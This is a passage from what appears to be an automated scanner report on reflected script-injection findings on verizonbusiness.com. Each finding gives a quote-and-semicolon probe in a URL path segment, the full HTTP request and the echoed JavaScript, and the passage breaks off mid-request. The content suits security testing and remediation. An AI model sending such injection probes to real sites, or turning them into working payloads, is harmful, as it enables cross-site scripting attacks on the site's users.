hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//
...[SNIP]...

1.770. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f4e4'%3b474c2e6f934 was submitted in the REST URL parameter 1. This input was echoed as 7f4e4';474c2e6f934 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f4e4'%3b474c2e6f934/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40714
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources7f4e4';474c2e6f934/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.771. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce34f"%3bbe3e8eccb23 was submitted in the REST URL parameter 2. This input was echoed as ce34f";be3e8eccb23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudiesce34f"%3bbe3e8eccb23/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:18 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudiesce34f";be3e8eccb23/cs_mitsui-verizon-consolidating-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.772. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c56f'%3bbaa2cf6c60f was submitted in the REST URL parameter 2. This input was echoed as 8c56f';baa2cf6c60f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies8c56f'%3bbaa2cf6c60f/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:24 GMT
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies8c56f';baa2cf6c60f/cs_mitsui-verizon-consolidating-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.773. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7429d'%3bb5039ad7341 was submitted in the REST URL parameter 3. This input was echoed as 7429d';b5039ad7341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf7429d'%3bb5039ad7341 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40322
Date: Wed, 17 Nov 2010 00:04:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf7429d';b5039ad7341'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.774. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2e7"%3b7119dbd91ae was submitted in the REST URL parameter 3. This input was echoed as dc2e7";7119dbd91ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdfdc2e7"%3b7119dbd91ae HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:32 GMT
Content-Type: text/html
Content-Length: 40322
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdfdc2e7";7119dbd91ae";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.775. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5218'%3bf65fc3ed524 was submitted in the REST URL parameter 1. This input was echoed as e5218';f65fc3ed524 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese5218'%3bf65fc3ed524/factsheets/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40686
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcese5218';f65fc3ed524/factsheets/fc_Security-Solutions-for-Retail'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.776. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf7"%3bc515644d40 was submitted in the REST URL parameter 1. This input was echoed as 77bf7";c515644d40 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources77bf7"%3bc515644d40/factsheets/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:13 GMT
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources77bf7";c515644d40/factsheets/fc_Security-Solutions-for-Retail";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATI
...[SNIP]...

1.777. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff7a'%3b7dacbee1b48 was submitted in the REST URL parameter 2. This input was echoed as 2ff7a';7dacbee1b48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets2ff7a'%3b7dacbee1b48/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:23:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/factsheets2ff7a';7dacbee1b48/fc_Security-Solutions-for-Retail'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.778. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94e05"%3b23fa5ff016e was submitted in the REST URL parameter 2. This input was echoed as 94e05";23fa5ff016e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets94e05"%3b23fa5ff016e/fc_Security-Solutions-for-Retail HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:46 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:22:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/factsheets94e05";23fa5ff016e/fc_Security-Solutions-for-Retail";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.779. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f980d"%3b9334d9d4d9 was submitted in the REST URL parameter 3. This input was echoed as f980d";9334d9d4d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets/fc_Security-Solutions-for-Retailf980d"%3b9334d9d4d9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:23:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/factsheets/fc_Security-Solutions-for-Retailf980d";9334d9d4d9";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.780. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17756'%3b86436e957b6 was submitted in the REST URL parameter 3. This input was echoed as 17756';86436e957b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets/fc_Security-Solutions-for-Retail17756'%3b86436e957b6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:23:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/factsheets/fc_Security-Solutions-for-Retail17756';86436e957b6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.781. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc8a'%3b989fc9833fd was submitted in the REST URL parameter 1. This input was echoed as acc8a';989fc9833fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesacc8a'%3b989fc9833fd/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesacc8a';989fc9833fd/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.782. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138e6"%3bd589f0b49a9 was submitted in the REST URL parameter 1. This input was echoed as 138e6";d589f0b49a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources138e6"%3bd589f0b49a9/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
